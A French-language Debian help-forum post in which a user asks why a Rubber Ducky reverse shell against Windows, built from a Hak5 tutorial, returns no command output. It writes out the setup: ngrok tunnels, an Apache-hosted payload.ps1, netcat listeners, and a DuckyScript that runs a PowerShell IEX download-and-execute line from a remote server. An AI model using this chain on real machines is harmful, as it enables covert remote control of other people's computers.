logo Debian Debian Debian-France Debian-Facile Debian-fr.org Forum-Debian.fr Debian ? Communautés logo inclusivité

Debian-facile

Bienvenue sur Debian-Facile, site d'aide pour les nouveaux utilisateurs de Debian.

Vous n'êtes pas identifié(e).

#1 Autres » Problème de connexion netcat avec un rubber ducky (reverse Shell) » 31-05-2020 22:25:51

lapeche
Réponses : 0
Bonjour, j’ai un problème avec netcat sur un reverse-Shell pour Windows avec une rubber ducky..
Voici le lien du tuto:
https://www.hak5.org/episodes/hak5-...- … bber-ducky

je vais détailler toutes les étapes de À à Z Pour une Meilleure compréhension.

1) je fais un ./ngrok tcp —region=eu —remoteadress 3.tcp.eu.ngrok.io: 22888 1111

2) je fais un sudo systémctl start apache2

3) je fais un ./ngrok http 80 -subdomain=mondomaine.com

4) j’ouvre payload.ps1 et mets 3.tcp.eu.ngrok.io et le port 22888

5) je mets le payload dans var/www/html

6) je rentre ce code sur ducktools.io en prenant soin de mettre en français le language ->

DELAY 1000
GUI r
DELAY 100
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/payload.ps1');"
ENTER

En remplaçant adresse mywebserver par mondomaine.com/payload.ps1

7) Je télécharge le inject.bin et la mets sur la ducky

8) mais avant je lance un nc -lvp 1111 et aussi un 3.tcp.eu.ngrok.io 22888 pour l écoute

(PS1): aux numéro 1 et 3 cela est la commande correspondante pour avoir une adresse tcp persistante et un sous domaine persistant

(PS2):au numéro 6 mondomaine.com s’affiche sous la forme mondomaine.com.ngrok.io

Seulement voici ce que m’affiche netcat pour le listener sous la commande nc -lvp 1111:
(Voir photo pièces jointe )
Tous à l’air bon seulement lorsque que je tape dir par exemple pour afficher dossiers rien ne s’affiche.
Je tiens à préciser que le contenu de la photo( Connect to 127.0.0.1 From localhost 127.0.0.1) s´affiche automatiquement des que je Lance les listeners et donc que je tape nc -lvp 1111 et nc 3.tcp.eu.ngrok.io 22888 avec insertion du ducky ou non.
Voilà merci et désolé du pavé en espérant qu’une solutions soit possible, bonne https://zupimages.net/up/20/22/qt7f.jpeg

Pied de page des forums

Propulsé par FluxBB